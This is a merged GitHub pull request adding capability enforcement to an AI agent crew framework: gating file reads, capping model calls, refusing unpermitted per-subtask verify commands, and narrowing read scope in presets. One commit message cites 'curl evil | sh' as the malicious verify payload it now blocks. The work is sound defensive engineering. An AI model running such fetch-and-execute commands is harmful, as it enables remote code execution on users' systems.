Skip to content

feat(ocap): enforcement floor steps 3–6 (collapsed) — fs_read, max_calls, team-verify, clamp grammar (#749)#781

Merged
hartsock merged 4 commits into
mainfrom
feat/ocap-floor-3-6
Jun 29, 2026
Merged

feat(ocap): enforcement floor steps 3–6 (collapsed) — fs_read, max_calls, team-verify, clamp grammar (#749)#781
hartsock merged 4 commits into
mainfrom
feat/ocap-floor-3-6

Conversation

@hartsock

Copy link
Copy Markdown
Member

OCAP enforcement floor — steps 3–6, collapsed · epic #749

Recovers the stacked enforcement PRs after step 2 (#751) squash-merged and its branch auto-deleted, which auto-closed the dependent #759. Steps 3–6 are cherry-picked onto current main as one PR, each step its own commit — superseding the orphaned #759/#760/#765/#768 (code identical).

Commits

  • #752 crew.rs — fs_read complete mediation
  • #753 crew.rs — max_calls (+ honest net scoping)
  • #754 team.rs — per-subtask verify exec gate (refuse-not-run)
  • #755 role_profile — optional fs_read clamp on NamedPermissionPreset

Each carries its red-on-today / green-after TDD test. Local just check + just cov-ci green on the collapsed branch.

Fixes #752, #753, #754, #755. Part of #749.

🤖 Generated with Claude Code

hartsock and others added 4 commits June 29, 2026 19:20
…752)

OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751). The crew CURATE stage read
navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the
navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the
permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never
passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read
caveat: ..."), so a clamped read fails visibly.

TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is
not read, the in-scope one is (red on today's code — both read; green after). just check green
(52 newt-scheduler tests, +1).

Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read
scope is a separate algebra refinement (follow-up). This PR wires the existing predicate.

Fixes #752. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
… budget (#753)

OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759). The crew loop bounded work only by
cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults
caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the
budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success).
The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is
now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default)
leaves unclamped crews unchanged.

net: documented in-code — the crew loop has no direct net effect a permits_net check could gate;
net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate
(per-axis complete mediation: this axis needs a sandbox, not a call-site).

TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with
max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green —
0). RED verified by neutralizing the gates. just check green.

Fixes #753. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
…is (#754)

OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify
(team.rs run_team) was installed as the test command with NO exec check — a malicious verify
(curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now
caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run
(not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the
same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies.

TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is
NOT installed, check-a is (red on today's code — both installed; green after). RED verified by
revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
…ix (#755)

OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765). The M6 grammar gap: a preset could
not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though
CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec>
(serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile
lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified.

Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp —
follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity;
default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default —
flipping it would break back-compat for every preset consumer).

TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat
(omitted fs_read => All) + config-parse. RED verified by revert. just check green.

Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test
fixtures); behavior-preserving (consumer literals use ..default()).

Fixes #755. Part of #749. Refs #739, #741.

Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

ocap Object-capability / authority-security; pending full design review

Projects

None yet

Development

Successfully merging this pull request may close these issues.

OCAP step 3: crew.rs enforces fs_read (complete mediation)

1 participant